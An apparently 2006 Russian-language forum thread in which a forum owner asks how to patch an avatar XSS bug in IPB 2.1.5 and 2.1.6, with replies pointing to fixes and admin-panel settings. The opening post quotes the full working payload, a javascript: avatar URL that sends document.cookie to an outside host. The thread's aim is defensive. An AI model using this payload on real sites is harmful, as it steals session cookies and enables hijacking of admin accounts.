Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?

Discussion in 'Песочница' started by Dimazzz, 30 Jun 2006.

  1. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Как всем известно в форуме IPB 2.1.5 и 2.1.6 есть такая бага, которая позволяет получить ХЕШ через аватар, по средством:

    javascript:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif

    для версии 2.1.6 нужно просто убрать теги

    у мня просьба : Подскажите как профиксить эту багу? в каком модуме ошибка и как ее исправить?
    Если можно ответ скинуть в личку.

    Заранее благодарен.
     
    1 person likes this.
  2. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,191
    Reputations:
    430
    В основном всё на сайт по безопасности расписано, где, чего, в каком модуле...поищи
     
  3. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Тебе вот СЮДА

    На даном форуме дыры находят,а не заделывают...
     
  4. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    http://www.ibresource.ru/forums/index.php?s=&showtopic=31531&view=findpost&p=187743
     
  5. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    спс ;) я нашол там одну темку , но чет не помогает:(, может эта бага еще осталась из версии 2.0.*
     
  6. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Вот последняя известная бага, как пофиксить здесь.
    http://www.ibresource.ru/forums/index.php?showtopic=31531&pid=187743&st=0%EF%BF%BDentry18774
     
  7. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Да эти я заделал :) , я никак немогу разобраться с той что через аватар :(
     
  8. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Если ты хочешь запретить теги, ну то есть использование в них изображений. В которых можно поместить сниффер.

    1.Заходишь в админу
    2.Идешь в Настройки(В меню выбора сферху)
    3.В "системных настройках" выбираещь "все основные настройки"
    4.Переходишь в Темы, Сообщения и Опросы
    5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят.
     
  9. bl4ck-cat

    bl4ck-cat Elder - Старейшина

    Joined:
    17 Jun 2006
    Messages:
    52
    Likes Received:
    12
    Reputations:
    10
    хм... а разве хэш воруется не солёный? тоесть от него же толку нету это просто активная хсс.... только кукизы тырить...
     
  10. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    bl4ck-cat
    С этим кукисом можно только под Админом зайти. Ну а топикстартер не хочет этого, т.к. злоумышленик может по форуму как админ лазить, все редактировать и т.д.
     
  11. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
     
  12. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    кто нить знает как это долб**** дырку закрыть?